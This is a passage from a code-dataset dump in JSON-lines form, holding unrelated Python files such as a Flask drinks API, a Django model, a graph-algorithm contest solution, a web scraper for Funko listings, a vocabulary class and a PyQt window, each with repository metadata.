[]\n opponentHistory.append(opponentMove)\n if opponentHistory:\n return opponentHistory[-1]\n else:\n return 1\n return 0\n\ndef name():\n return 'titForTat'\n\n","sub_path":"titForTat.py","file_name":"titForTat.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"378493638","text":"from django.db import models\nfrom django.utils import timezone\n\n# Create your models here.\n\nclass Project(models.Model):\n # 사진 ImageField(upload_to=None, height_field=None, width_field=None, max_length=100, **options)참\n image = models.ImageField(default=\"\", blank=True)\n # 파일업로드\n file = models.FileField(upload_to='uploads', default=\"\", blank=True)\n\n project_title = models.CharField(max_length=100) # 프로젝트 제목\n project_shorten = models.TextField(default=\"\", max_length=100) # 프로젝트 간략설명(2줄 이내)\n project_text = models.TextField() # 프로젝트 상세설명\n project_date = models.DateField('Date Finished') # 프로젝트 날짜\n project_member = models.TextField(default=\"No one\") # 멤버 이름\n project_extra = models.TextField(default=\"\", blank=True) # 기타정보\n project_year_semester = models.TextField() # 년도-학기\n project_year = models.TextField() # 년도\n\n def project_year_semester(self):\n if self.project_date.month >= 1 & self.project_date.month <= 6:\n semester = 1\n elif self.project_date.month >= 7 & self.project_date.month <= 12:\n semester = 2\n else:\n semester = 3\n return str(self.project_date.year) + '-' + str(semester)\n\n def project_year(self):\n return str(self.project_date.year)\n\n def publish(self):\n self.project_date = timezone.now()\n self.save()\n\n def __str__(self):\n return self.project_title\n","sub_path":"homepage/projects/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"576077647","text":"import sys\nread=lambda:sys.stdin.readline().strip()\nwrite=lambda x:sys.stdout.write(str(x)+\"\\n\")\nN = int(read())\nM = int(read())\nrel = [[100 for _ in range(N)] for __ in range(N)]\nfor _ in range(M):\n a, b = map(int, read().split())\n rel[a-1][b-1] = 1\n rel[b-1][a-1] = 1\n\nfor k in range(N):\n for i in range(N):\n A = rel[i][k]\n if not A:\n continue \n for j in range(N):\n if i == j or j == k:\n continue\n B = rel[k][j]\n if not B:\n continue\n C = rel[i][j]\n if C > A + B:\n rel[i][j] = A + B\n\ngroups = []\npeople = {i for i in range(N)}\nfor i in range(N):\n group = set()\n if i not in people:\n continue\n for j in range(N):\n if rel[i][j] != 100 or i == j:\n group.add(j)\n people.remove(j)\n groups.append(group)\n\nwrite(len(groups))\nresult = []\nfor group in groups:\n gidx, gmin = -1, 100 \n for person in group:\n rels = [c for c in rel[person] if c != 100]\n if not rels:\n gidx = person\n continue\n cnt = max(rels)\n if cnt < gmin:\n gidx = person\n gmin = cnt\n result.append(gidx)\nfor r in sorted(result):\n write(r+1)\n\n\n'''\n플로이드 와셜 말고 다릏게 풀수 있긴함..\n1. 양방향 그래프이기 때문에, dfs돌면 컴포넌트 단위로 잘라낼 수 있음.\n그러면서 각 사람이 어느 그룹에 속해있는지 기록해둔다.\n\n2. 그렇게 하고나서 각 사람을 기준으로 dijstra를 한다.\n그 과정에서 같은 그룹에 속해있지 않으면 continue해버린다.\n그 결과를 dist table에 저장하고, max distance가 최소가 되는 노드를 찾는다.\n\n3. 그럼 플로이드 보다 빠름. \n\n\n'''","sub_path":"graph_problems/Shortest_path/dijikstra/preparing_conference_2610.py","file_name":"preparing_conference_2610.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"500236859","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2016-10-19 15:19:20\n# @Author : Your Name (you@example.org)\n# @Link : http://example.org\n# @Version : $Id$\n\nimport os\ndef parrot(voltage, state = 'a stiff', action = 'voom', type = 'Norwegian Blue'):\n\tprint(\"-- This parrot wouldn't \", action, end=' ')\n\tprint(\"if you put \", voltage, \" volts through it.\")\n\tprint(\"-- Lovely plumage, the\", type)\n\tprint(\"-- It's \",state,\"!\")\n\nparrot(1000)\nparrot(voltage = 1000)\nparrot(voltage = 1000000, action = \"VOOOOOM\")\nparrot(action = \"VOOOOOM\", voltage = 1000000)\nparrot('a million', 'bereft of life', 'jump')\nparrot('a thousand', state='pushing up the daisies')\n\nos.system(\"pause\")\n","sub_path":"keywordarguments.py","file_name":"keywordarguments.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"107471731","text":"import requests\nimport bs4\nfrom replit import db\n\nbigboys_URL = 'https://www.bigboys.ph/FUNKO-c16020004'\nfilbarstore_URL = 'https://shop.filbars.online/collections/funko'\n\nheaders = {\n \"User-Agent\":\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\"\n}\n\n\ndef checkbigboys():\n\n pops = ''\n\n page = requests.get(bigboys_URL, headers=headers)\n\n soup = bs4.BeautifulSoup(page.content, 'html.parser')\n\n for funko in db['items']:\n for item in soup.find_all('div', attrs={'class':\n 'grid-product__wrap'}):\n item_name = item.find('div',\n attrs={'class': 'grid-product__title-inner'})\n if funko in item_name.text:\n pops = pops + item_name.text.strip()\n price = item.find(\n 'div',\n attrs={'class': 'grid-product__price-value ec-price-item'})\n pops = pops + ' ' + price.text.strip() + '\\n '\n try:\n return (pops)\n except:\n return ('None')\n\n\ndef checkfilbarstore():\n\n pops = ' '\n\n page = requests.get(filbarstore_URL, headers=headers)\n\n soup = bs4.BeautifulSoup(page.content, 'html.parser')\n\n for funko in db['items']:\n for items in soup.find_all('a', attrs={'class': 'product-card'}):\n item_name = items.find('div',\n attrs={'class': 'product-card__name'})\n if funko in item_name.text:\n pops = pops + item_name.text.strip()\n price = items.find('div',\n attrs={'class': 'product-card__price'})\n pops = pops + ' ' + price.text.strip() + '\\n '\n try:\n return (pops)\n except:\n return ('None')\n\n\ndef update_items(item_to_find):\n if 'items' in db.keys():\n items = db['items']\n items.append(item_to_find)\n db['items'] = items\n else:\n db['items'] = ['Avatar']\n\n\ndef delete_item(index):\n items = db['items']\n if len(items) > index:\n del items[index]\n db['items'] = items\n\n\ndef get_helpmessage():\n\n help_message = \"\"\"Commands:\n&funkome - start searching for funko pops\n&help - list of commands\n\n&new_item -keyword here- to add a new keyword that the bot will use to search\n&del_item -keyword here- to delete a keyword that the bot can use to search\n&list_items - to show the keywords that the bot will use to search\n \"\"\"\n return (help_message)\n","sub_path":"Webscrape.py","file_name":"Webscrape.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"328378943","text":"from deeppavlov.core.components import Component\nfrom deeppavlov.core.registrable import Registrable\nfrom collections import Counter, defaultdict\nimport numpy as np\nfrom overrides import overrides\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass Vocabulary:\n def __init__(self, tokens=None, special_tokens=tuple(), dict_file_path=None):\n if tokens is None and dict_file_path is not None:\n tokens = self.load(dict_file_path)\n self._t2i = dict()\n # We set default ind to position of in SPECIAL_TOKENS\n # because the tokens will be added to dict in the same order as\n # in special_tokens\n default_ind = 0\n self._t2i = defaultdict(lambda: default_ind)\n self._i2t = dict()\n self.frequencies = Counter()\n\n self.counter = 0\n for token in special_tokens:\n self._t2i[token] = self.counter\n self.frequencies[token] += 0\n self._i2t[self.counter] = token\n self.counter += 1\n if tokens is not None:\n self.update_dict(tokens)\n\n def update_dict(self, tokens):\n for token in tokens:\n if not isinstance(token, str):\n self.update_dict(token)\n else:\n if token not in self._t2i:\n self._t2i[token] = self.counter\n self._i2t[self.counter] = token\n self.counter += 1\n self.frequencies[token] += 1\n\n def idx2tok(self, idx):\n return self._i2t[idx]\n\n def idxs2toks(self, idxs, filter_paddings=False):\n toks = []\n for idx in idxs:\n if not filter_paddings or idx != self.tok2idx(''):\n toks.append(self._i2t[idx])\n return toks\n\n def process(self, tokens):\n if not isinstance(tokens, str):\n return [self.process(token) for token in tokens]\n else:\n return self.tok2idx(tokens)\n\n def tok2idx(self, tok):\n return self._t2i[tok]\n\n def toks2idxs(self, toks):\n return [self._t2i[tok] for tok in toks]\n\n def batch_toks2batch_idxs(self, b_toks):\n max_len = max(len(toks) for toks in b_toks)\n # Create array filled with paddings\n batch = np.ones([len(b_toks), max_len]) * self.tok2idx('')\n for n, tokens in enumerate(b_toks):\n idxs = self.toks2idxs(tokens)\n batch[n, :len(idxs)] = idxs\n return batch\n\n def batch_idxs2batch_toks(self, b_idxs, filter_paddings=False):\n return [self.idxs2toks(idxs, filter_paddings) for idxs in b_idxs]\n\n def is_pad(self, x_t):\n assert type(x_t) == np.ndarray\n return x_t == self.tok2idx('')\n\n def __getitem__(self, key):\n return self._t2i[key]\n\n def __len__(self):\n return self.counter\n\n def __contains__(self, item):\n return item in self._t2i\n\n def load(self, dict_file_path):\n tokens = list()\n with open(dict_file_path) as f:\n for line in f:\n if len(line) > 0:\n tokens.append(line.strip())\n return tokens\n\n def save(self, path):\n with open(path, \"w+\") as f:\n for token in self._t2i.keys():\n f.write(\"%s\\n\" % token)\n\n\n@Registrable.register(\"vocab\")\nclass VocabComponent(Component):\n def __init__(self, config):\n super().__init__(config)\n self.local_input_names = ['tokens']\n self.local_output_names = ['idxs']\n self.vocab = Vocabulary()\n\n @overrides\n def forward(self, smem, add_local_mem=False):\n if len(self.inputs) > 0 and len(self.outputs) > 0:\n samples = self.get_input(\"tokens\", smem)\n result = self.vocab.process(samples)\n self.set_output(\"idxs\", result, smem)\n\n @overrides\n def train(self, smem, add_local_mem=False):\n tokens = self.get_input(\"tokens\", smem)\n self.vocab.update_dict(tokens)\n\n @overrides\n def save(self):\n if \"save_to\" in self.config:\n path = self.config[\"save_to\"]\n import os\n os.makedirs(os.path.dirname(path), exist_ok=True)\n self.vocab.save(path)\n\n @overrides\n def load(self):\n if \"load\" in self.config:\n path = self.config[\"load\"]\n self.vocab.update_dict(self.vocab.load(path))\n\n @overrides\n def setup(self, components={}):\n super().setup(components)\n self.load()\n\n\n@Registrable.register(\"bow\")\nclass BowComponent(VocabComponent):\n def __init__(self, config):\n super().__init__(config)\n self.local_input_names = ['tokens']\n self.local_output_names = ['bow']\n\n @overrides\n def forward(self, smem, add_local_mem=False):\n if len(self.inputs) > 0 and len(self.outputs) > 0:\n tokens = self.get_input(\"tokens\", smem)\n bow = np.zeros([len(self.vocab)], dtype=np.int32)\n for word in tokens:\n if word in self.vocab:\n idx = self.vocab.tok2idx(word)\n bow[idx] += 1\n self.set_output(\"bow\", bow, smem)","sub_path":"deeppavlov/core/vocab.py","file_name":"vocab.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"505536626","text":"from sklearn.model_selection import train_test_split\n\n\nDATA_DIR = 'C:/Users/nuaax/Dropbox/data61/project/stance_classification/dataset/semeval/'\nTRAIN_DEV = DATA_DIR + 'semeval2016-task6-subtaskA-train-dev-%s.txt'\nTRAIN = DATA_DIR + 'semeval2016-task6-subtaskA-train-%s.txt'\nDEV = DATA_DIR + 'semeval2016-task6-subtaskA-dev-%s.txt'\n\n\ndata_size_tr = {\n 'a': 513,\n 'cc': 395,\n 'fm': 664,\n 'hc': 689,\n 'la': 653,\n}\n\ntarget_name = {\n 'a': 'Atheism',\n 'cc': 'Climate Change is a Real Concern',\n 'fm': 'Feminist Movement',\n 'hc': 'Hillary Clinton',\n 'la': 'Legalization of Abortion',\n}\n\n\ndef create_dev_set(t, ignore_header=True):\n \"\"\"\n Create validation set from training set based on stratified split\n \"\"\"\n with open(TRAIN_DEV % t, encoding='windows-1252') as train_dev_file:\n X = []\n y = []\n if ignore_header:\n next(train_dev_file)\n for line in train_dev_file:\n _id, target, text, label = line.strip().split('\\t')\n assert target == target_name[t]\n X.append((_id, target, text))\n y.append(label)\n assert len(X) == len(y) == data_size_tr[t]\n X_train, X_dev, y_train, y_dev = train_test_split(X, y,\n test_size=0.1,\n random_state=42,\n stratify=y)\n print('X_train:', len(X_train))\n print('y_train:', len(y_train))\n print('X_dev:', len(X_dev))\n print('y_dev:', len(y_dev))\n\n assert len(X_train) + len(X_dev) == data_size_tr[t]\n assert len(y_train) + len(y_dev) == data_size_tr[t]\n\n n_f_train = len([label for label in y_train if label == 'FAVOR'])\n n_a_train = len([label for label in y_train if label == 'AGAINST'])\n n_n_train = len([label for label in y_train if label == 'NONE'])\n\n n_f_dev = len([label for label in y_dev if label == 'FAVOR'])\n n_a_dev = len([label for label in y_dev if label == 'AGAINST'])\n n_n_dev = len([label for label in y_dev if label == 'NONE'])\n\n print('training set\\n\\t#f: %d, #a: %d, #n: %d, f/a: %f, a/n: %f'\n % (n_f_train, n_a_train, n_n_train, n_f_train/n_a_train, n_a_train/n_n_train))\n print('development set\\n\\t#f: %d, #a: %d, #n: %d, f/a: %f, a/n: %f'\n % (n_f_dev, n_a_dev, n_n_dev, n_f_dev/n_a_dev, n_a_dev/n_n_dev))\n\n # write to train\n print('saving to %s ...' % (TRAIN % t))\n with open(TRAIN % t, 'w') as train_file:\n if ignore_header:\n train_file.write('ID\\tTarget\\tTweet\\tStance\\n')\n for i in range(len(X_train)):\n train_file.write('\\t'.join(X_train[i]) + '\\t' + y_train[i] + '\\n')\n print('saved.')\n\n # write to dev\n print('saving to %s ...' % (DEV % t))\n with open(DEV % t, 'w') as dev_file:\n if ignore_header:\n dev_file.write('ID\\tTarget\\tTweet\\tStance\\n')\n for i in range(len(X_dev)):\n dev_file.write('\\t'.join(X_dev[i]) + '\\t' + y_dev[i] + '\\n')\n print('saved.')\n\n\nif __name__ == '__main__':\n # create_dev_set('a')\n # create_dev_set('cc')\n # create_dev_set('fm')\n # create_dev_set('hc')\n # create_dev_set('la')\n pass\n\n","sub_path":"datasets/prepare_semeval16.py","file_name":"prepare_semeval16.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"352110524","text":"from cudatext import *\n\nclass Command:\n def run(self):\n carets = ed.get_carets()\n if len(carets)<2: \n msg_box('Place several carets first', MB_OK)\n return\n\n s = dlg_input_ex(4, 'Carets Numbering', \n 'Starting number:', '1', \n 'Digits:', '1',\n 'Text before numbers:', '',\n 'Text after numbers:', '')\n if not s: return\n try:\n n_start = int(s[0])\n except:\n msg_box('Incorrect number entered: '+s[0], MB_OK)\n return\n try:\n n_len = int(s[1])\n except:\n msg_box('Incorrect number entered: '+s[1], MB_OK)\n return\n \n text_before = s[2]\n text_after = s[3]\n \n carets = list(reversed(carets))\n \n ed.lock()\n for i, caret in enumerate(carets):\n num = (len(carets)-i+n_start-1)\n text = text_before + ('%0'+str(n_len)+'d') % num + text_after\n ed.insert(caret[0], caret[1], text)\n ed.unlock()\n \n msg_status('Inserted %d numbers' % len(carets))\n ","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"467713889","text":"from operator import truediv\nimport os\nfrom flask import Flask, request, jsonify, abort\nfrom sqlalchemy import exc\nimport json\nfrom flask_cors import CORS\n\nfrom database.models import db_drop_and_create_all, setup_db, Drink\nfrom auth.auth import AuthError, requires_auth\n\napp = Flask(__name__)\nsetup_db(app)\nCORS(app)\n\n# only the line below uncomment on first run to create db and re comment for data not to get erase every time\n\n# db_drop_and_create_all()\n\n# ROUTES\n\n\n@app.route('/drinks')\ndef get_drinks():\n try:\n\n drinks = Drink.query.all()\n\n results = []\n\n for drink in drinks:\n results.append(drink.short())\n\n return jsonify({\n 'success': 200,\n 'drinks': results\n }), 200\n except:\n abort(404)\n\n\n@app.route('/drinks-detail')\n@requires_auth('get:drinks-detail')\ndef get_drink_details(jwt):\n\n try:\n drinks = Drink.query.all()\n\n results = []\n if drinks:\n for drink in drinks:\n results.append(drink.long())\n\n return jsonify({\n 'success': True,\n 'drinks': results\n }), 200\n except:\n abort(404)\n\n\n@app.route('/drinks', methods=['POST'])\n@requires_auth('post:drinks')\ndef post_drinks(jwt):\n\n try:\n data = request.get_json()\n\n title = data['title']\n recipe = data['recipe']\n drink = Drink(title=title, recipe=json.dumps(recipe))\n drink.insert()\n\n return jsonify({\n 'success': 200,\n 'drinks': drink.long()\n }), 200\n except:\n abort(400)\n\n\n@app.route('/drinks/', methods=['PATCH'])\n@requires_auth('patch:drinks')\ndef post_drink(jwt, drink_id):\n\n try:\n data = request.get_json()\n\n drink = Drink.query.filter(Drink.id == drink_id).first()\n\n if not drink:\n abort(404)\n\n title = ''\n\n if 'title' in data:\n title = data['title']\n else:\n title = drink.title\n\n recipe = ''\n if 'recipe' in data:\n recipe = data['recipe']\n else:\n recipe = drink.recipe\n\n drink.title = title\n drink.recipe = str(recipe)\n drink.update()\n\n result = []\n\n result.append(drink.long())\n\n return jsonify({\n 'success': True,\n 'drinks': result\n }), 200\n except:\n abort(404)\n\n\n@app.route('/drinks/', methods=['DELETE'])\n@requires_auth('delete:drinks')\ndef delete_drink(jwt, drink_id):\n\n try:\n\n drink = Drink.query.filter(Drink.id == drink_id).first()\n\n if not drink:\n abort(404)\n\n drink.delete()\n\n return jsonify({\n 'success': True,\n 'delete': drink_id\n }), 200\n except:\n abort(404)\n\n# Error Handling\n\n\n@app.errorhandler(422)\ndef unprocessable(error):\n return jsonify({\n \"success\": False,\n \"error\": 422,\n \"message\": \"unprocessable\"\n }), 422\n\n\n@app.errorhandler(404)\ndef not_found(error):\n\n return jsonify({\n 'success': False,\n 'error': 404,\n 'message': 'resource not found'\n }), 404\n\n\n@app.errorhandler(AuthError)\ndef auth_error(error):\n\n return jsonify({\n 'success': False,\n 'error': error.error,\n 'message': 'Authentication error'\n }), error.status_code\n\n\nif __name__ == '__main__':\n port = int(os.environ.get(\"PORT\", 5000))\n app.run(host='0.0.0.0', port=port)\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"416011993","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'oyilmaz'\n\nimport scrapy\nimport datetime\nimport urlparse\nimport logging\nfrom time import strftime, gmtime\nfrom scrapy import log, signals\nfrom scrapy.conf import settings\nfrom scrapy.xlib.pydispatch import dispatcher\n\n\nfrom ..items import ModagramProduct\n\nclass ModagramSpider(scrapy.Spider):\n\n\tname = 'modagram'\n\tallowed_domains = ['www.modagram.com']\n\tstart_urls = ['http://www.modagram.com/kadin/urunleri/liste?f_c1=1-2-337-338']\n\t\n\tBASE_URL = 'http://www.modagram.com'\n\n\tdef __init__(self, **kwargs):\n\n\t\tself.matrix_id_set = set()\n\t\tdispatcher.connect(self.spider_closed, signals.spider_closed)\n\n\tdef spider_closed(self, spider):\n\t\t\n\t\tlogging.info('Total number of ProductVariantMatrixIds: %d' % len(self.matrix_id_set))\n\n\t\tnow = strftime('%Y-%m-%d %H:%M:%S', gmtime())\n\t\twith open('mg_live_products_{date}.csv'.format(date=now), 'w') as f:\n\t\t\tf.write('ProductVariantMatrixId\\n')\n\t\t\tfor id in self.matrix_id_set:\n\t\t\t\tf.write(id + '\\n')\n\n\n\tdef parse(self, response):\n\n\t\tpages = response.xpath('//*[@id=\"ProductList\"]/div[1]/div[3]//a/text()').extract()[:-1]\n\t\ttotal_pages = max(map(int, pages))\n\t\tnext_page = 1\n\n\t\turl = 'liste?f_c1=1-2-337-338&page={page_no}'\n\t\tbase_url = 'http://www.modagram.com/kadin/urunleri/liste?f_c1=1-2-337-338'\n\t\t# while(next_page <= total_pages):\n\t\t# \tprint next_page\n\t\t# \treturn scrapy.Request(\n\t\t# \t\turlparse.urljoin(self.BASE_URL, url.format(page_no=next_page)),\n\t\t# \t\tcallback = self.parse_products\n\t\t# \t\t)\n\t\t# \tnext_page += 1\n\t\treturn scrapy.Request(\n\t\t\t\turlparse.urljoin(base_url, url.format(page_no=next_page)),\n\t\t\t\tcallback = self.parse_products\n\t\t\t\t)\n\n\t\t\n\n\tdef parse_products(self, response):\n\n\t\tproduct_list = response.xpath('//ol[@id=\"OrderedProducts\"]//li')\n\n\t\tfor product in product_list:\n\t\t\turl = product.xpath('.//a/@href').extract()[0]\n\t\t\t\n\t\t\tyield scrapy.Request(\n\t\t\t\turlparse.urljoin(self.BASE_URL, url),\n\t\t\t\tcallback = self.parse_product_details\n\t\t\t\t)\n\n\tdef parse_product_details(self, response):\n\n\t\tproduct = ModagramProduct()\n\t\t\n\t\tmatrix_ids = response.xpath('//div[@class=\"ProductSize\"]//a[@stockqty!=\"0\"]/@matrixid').extract()\n\n\t\tfor id in matrix_ids:\n\t\t\tself.matrix_id_set.add(id)\n\n\n","sub_path":"modagram_scraper/spiders/modagram_spider.py","file_name":"modagram_spider.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"35755786","text":"from PyQt4 import QtCore,QtGui \nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nimport sys\nimport os\nimport bs4\nimport urllib\nimport threading\nimport time\nimport requests\nimport webbrowser\n\n# DEFAULT_COLOR = \"#2a2727\" # Think about this color :)\nDEFAULT_COLOR = \"#3498db\"\n\nclass MainWindow(QWidget):\n def __init__(self,parent=None):\n super(MainWindow,self).__init__(parent)\n\n self.setWindowFlags(QtCore.Qt.FramelessWindowHint)\n\n self.btc = \"\"\n \n\n def window(self):\n self.setGeometry(100,100,600,700)\n\n QtGui.QFontDatabase.addApplicationFont(resource_path(r'Fonts\\Ubuntu-Light.ttf'))\n\n # self.setStyleSheet(\"QWidget{background-color:#DFE6EC;font-family:'Ubuntu Light';border:0px solid \"+DEFAULT_COLOR_HOVER+\";}\")\n\n self.border = QLabel(self)\n self.border.setGeometry(0,0,600,700)\n self.border.setStyleSheet(\"border:2px solid \"+DEFAULT_COLOR+\";border-bottom:transparent;botder-right:transparent;border-top:transparent;\")\n self.border.setDisabled(True)\n\n self.logo = QPushButton(self)\n self.logo.setStyleSheet(\"background-color:transparent;border:0;\")\n self.logo.setIcon(QIcon(resource_path(r\"Icons\\logo.png\")))\n self.logo.setIconSize(QSize(390,100))\n self.logo.move(10,-5)\n\n\n close = QPushButton(self)\n close.setGeometry(530,20,50,50)\n close.setStyleSheet(\".QPushButton{background-color:transparent;}\")\n # close.setStyleSheet(\".QPushButton{background-color:transparent;border:0;border-bottom:0px solid #34495e;} .QPushButton:hover{background-color:\"+DEFAULT_COLOR_HOVER+\";} .QPushButton:pressed{border-top:2px solid \"+DEFAULT_COLOR_HOVER+\";}\")\n close.setIcon(QIcon(resource_path(r\"Icons\\close.png\")))\n close.setIconSize(QSize(18,18))\n close.setCursor(Qt.PointingHandCursor)\n close.clicked.connect(self.close)\n \n # minim = QPushButton(self)\n # minim.setGeometry(500,0,50,50)\n # # minim.setStyleSheet(\".QPushButton{background-color:transparent;border:0;border-bottom:0px solid #34495e;} .QPushButton:hover{background-color:\"+DEFAULT_COLOR_HOVER+\";} .QPushButton:pressed{border-top:2px solid \"+DEFAULT_COLOR_HOVER+\";}\")\n # minim.setIcon(QIcon(resource_path(r\"Icons\\minim.png\")))\n # minim.setIconSize(QSize(15,15))\n # minim.setCursor(Qt.PointingHandCursor)\n # minim.clicked.connect(self.showMinimized)\n\n thread = threading.Thread(target=self.animate)\n thread.start()\n\n frameGm = self.frameGeometry()\n screen = QtGui.QApplication.desktop().screenNumber(QtGui.QApplication.desktop().cursor().pos())\n centerPoint = QtGui.QApplication.desktop().screenGeometry(screen).center()\n frameGm.moveCenter(centerPoint)\n self.move(frameGm.topLeft())\n self.setWindowTitle(\"Tomos Mining\")\n pos1 = self.x()\n pos2 = self.y()\n position_animator(self,pos1,900,pos1,pos2,duration=600)\n self.setWindowIcon(QIcon(resource_path(r\"Icons\\icon.png\")))\n self.show()\n def animate(self):\n opcty = 0.0\n for i in range(11):\n time.sleep(0.06)\n self.setWindowOpacity(opcty)\n opcty+=0.1\n\ndef position_animator(obj = None,from_x = 0,from_y = 0,to_x = 0,to_y = 0,duration=500):\n animation = QPropertyAnimation(obj,\"geometry\",obj)\n animation.setStartValue(QRect(from_x,from_y,obj.width(),obj.height()))\n animation.setEndValue(QRect(to_x,to_y,obj.width(),obj.height()))\n animation.setDuration(duration)\n animation.setEasingCurve(QEasingCurve.OutQuart)\n animation.start()\n\ndef size_animator(obj = None,from_width = 0,from_height = 0,to_width = 0,to_height = 0,duration=500):\n animation = QPropertyAnimation(obj,\"geometry\",obj)\n animation.setStartValue(QRect(obj.x(),obj.y(),from_width,from_height))\n animation.setEndValue(QRect(obj.x(),obj.y(),to_width,to_height))\n animation.setDuration(duration)\n animation.setEasingCurve(QEasingCurve.OutQuart)\n animation.start()\ndef resource_path(relative_path):\n \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\n try:\n # PyInstaller creates a temp folder and stores path in _MEIPASS\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath(\".\")\n\n return os.path.join(base_path, relative_path)\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n wndw = MainWindow()\n wndw.window()\n sys.exit(app.exec_())","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"357986576","text":"import cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt \r\n\r\nimg = cv2.imread(\"baboon.jpg\")\r\n\r\ngp = [img] #gaussian pyramid\r\nfor i in range(6):\r\n\timg = cv2.pyrDown(img)\r\n\tgp.append(img)\r\n\tcv2.imshow(str(i),img)\r\nimg = gp[5]\r\ncv2.imshow('gpimg',img)\r\n\r\nlp = [img] #laplacian pyramid \r\nfor i in range(5, 0, -1):\r\n\text = cv2.pyrUp(gp[i])\r\n\tlap = cv2.subtract(gp[i-1],ext)\r\n\tlp.append(lap)\r\n\tcv2.imshow(str(i),lap)\r\nimg = lp[5]\r\ncv2.imshow('lpimg',img)\r\n\r\nplt.show()\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","sub_path":"gaussian and laplacian pyramid/pyramid2.py","file_name":"pyramid2.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"335034589","text":"import xml.etree.ElementTree as ET\nimport glob\nimport os\n\n# NOTE: remove xml file with no annotation\n# src = '/home/hoang/datasets/JR/test/annos/'\n# files = glob.glob(src + '*.xml')\n#\n# for file in files:\n# print(file)\n# tree = ET.parse(file)\n# root = tree.getroot()\n# if root.find('object') is None:\n# os.remove(file)\n\n# NOTE: remove image with no annotation\nroot = '/home/hoang/datasets/JR/train'\nimages_dir = root + '/images/'\nannos_dir = root + '/annos/'\nxml_files = glob.glob(annos_dir + '*.xml')\nimg_files = glob.glob(images_dir + '*.jpg')\nfname = []\nfor xml in xml_files:\n name = os.path.basename(xml)\n _name, _ = os.path.splitext(name)\n fname.append(_name)\n\nfor image in img_files:\n name = os.path.basename(image)\n _name, _ = os.path.splitext(name)\n if _name not in fname:\n os.remove(image)\n\n","sub_path":"tools/check_xml.py","file_name":"check_xml.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"548789231","text":"\"\"\"Working with list values.\"\"\"\nfrom redis_python_tutorial.logging import logger\n\n\ndef list_values_demo(r):\n \"\"\"Push and pop items from a list.\"\"\"\n # Add single string to a new list.\n r.lpush('my_list', 'A')\n logger.info(f\"my_list: {r.lrange('my_list', 0, -1)}\")\n\n # Push second string to list from the right.\n r.rpush('my_list', 'B')\n logger.info(f\"my_list: {r.lrange('my_list', 0, -1)}\")\n\n # Push third string to list from the right.\n r.rpush('my_list', 'C')\n logger.info(f\"my_list: {r.lrange('my_list', 0, -1)}\")\n\n # Remove 1 instance from the list where the value equals 'C'.\n r.lrem('my_list', 1, 'C')\n logger.info(f\"my_list: {r.lrange('my_list', 0, -1)}\")\n\n # Push a string to our list from the left.\n r.lpush('my_list', 'C')\n logger.info(f\"my_list: {r.lrange('my_list', 0, -1)}\")\n\n # Pop first element of our list and move it to the back.\n r.rpush('my_list', r.lpop('my_list'))\n logger.info(f\"my_list: {r.lrange('my_list', 0, -1)}\")\n","sub_path":"redis_python_tutorial/data/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"394161715","text":"#!python\nfrom helpers import iter_group_test, iter_group\nfrom string import ascii_lowercase\n\ndef countQuestions(groupdata):\n count = 0\n for letter in ascii_lowercase:\n good = True\n for answers in groupdata.splitlines():\n if letter not in answers:\n good = False\n break\n if good:\n count +=1\n return count\n\ngroupcounts = []\nfor group in iter_group(6):\n groupcounts.append(countQuestions(group))\nprint(sum(groupcounts))\n","sub_path":"6.2.py","file_name":"6.2.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"273411188","text":"def getFileData(fileName):\n f = open(fileName , 'r')\n data = f.read().split('\\n')\n\n return data\n\ndef insertUniqueValue(dbFile, inputFile):\n dbData = getFileData(dbFile)\n inputData = getFileData(inputFile)\n\n length = len(inputData)\n proc = 0\n\n for i in range(0, length):\n\n newProc = 100 * i / length\n\n if proc != newProc:\n proc = newProc\n print(str(proc) + 